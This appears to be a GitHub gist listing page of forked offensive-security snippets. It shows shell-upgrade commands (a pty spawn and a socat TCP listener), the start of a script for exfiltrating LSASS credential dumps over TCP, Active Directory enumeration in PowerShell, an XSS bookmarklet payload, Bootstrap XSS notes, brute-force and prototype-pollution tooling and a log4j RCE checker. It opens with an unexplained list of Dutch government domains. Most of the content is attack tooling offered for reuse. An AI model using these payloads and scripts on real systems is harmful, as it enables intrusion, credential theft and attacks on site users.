Skip to content

Instantly share code, notes, and snippets.

knmi.nl
rijksoverheid.nl
overheid.nl
duo.nl
politie.nl
koninklijkhuis.nl
defensie.nl
kadaster.nl
werkenbijdefensie.nl
cbs.nl
@dutchcyberguy
dutchcyberguy / Upgrade shell to full TTY.md
Created December 22, 2022 16:59 — forked from su-tiko/Upgrade shell to full TTY.md
Pass from a no-interactive shell to fully TTY

Python

python -c 'import pty; pty.spawn("/bin/bash")'

Socat

Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444
@dutchcyberguy
dutchcyberguy / GetZip.py
Created July 30, 2022 12:38 — forked from snovvcrash/GetZip.py
Exfiltrate LSASS dump over TCP
#!/usr/bin/env python3
# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz
import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser
@dutchcyberguy
dutchcyberguy / Bootstrap_XSS.md
Created July 30, 2022 12:38 — forked from BlackFan/Bootstrap_XSS.md
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

@dutchcyberguy
dutchcyberguy / domain_scripts.md
Created January 8, 2022 16:45 — forked from dejisec/domain_scripts.md
Active Directory Scripts

Enumerate Domain Users

$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
javascript:(function(){for (var t = document.getElementsByTagName("input"), e = 0; e < t.length; e++) "text" == t[e].getAttribute("type") && (t[e].value = '"><img src onerror=alert(document.domain)>')})();void(0)
@dutchcyberguy
dutchcyberguy / cluster.py
Created December 29, 2021 14:28 — forked from renniepak/cluster.py
Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Gist of the Day: Turbo Intruder Cluster Bomb with SmartFiltering
# Author: Evan Custodio (@defparam)
#
# MIT License
# Copyright 2021 Evan Custodio
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
@dutchcyberguy
dutchcyberguy / fingerprint.js
Created December 29, 2021 14:27 — forked from renniepak/fingerprint.js
Script to fingerprint Script Gadgets to use to exploit Prototype Pollution. Updated version. Original Creator: Nikita Stupin @_nikitastupin
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}
@dutchcyberguy
dutchcyberguy / log4j_rce_check.py
Created December 10, 2021 16:55 — forked from byt3bl33d3r/log4j_rce_check.py
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
@dutchcyberguy
dutchcyberguy / Active Directory Attacks.md
Created December 7, 2021 20:25 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp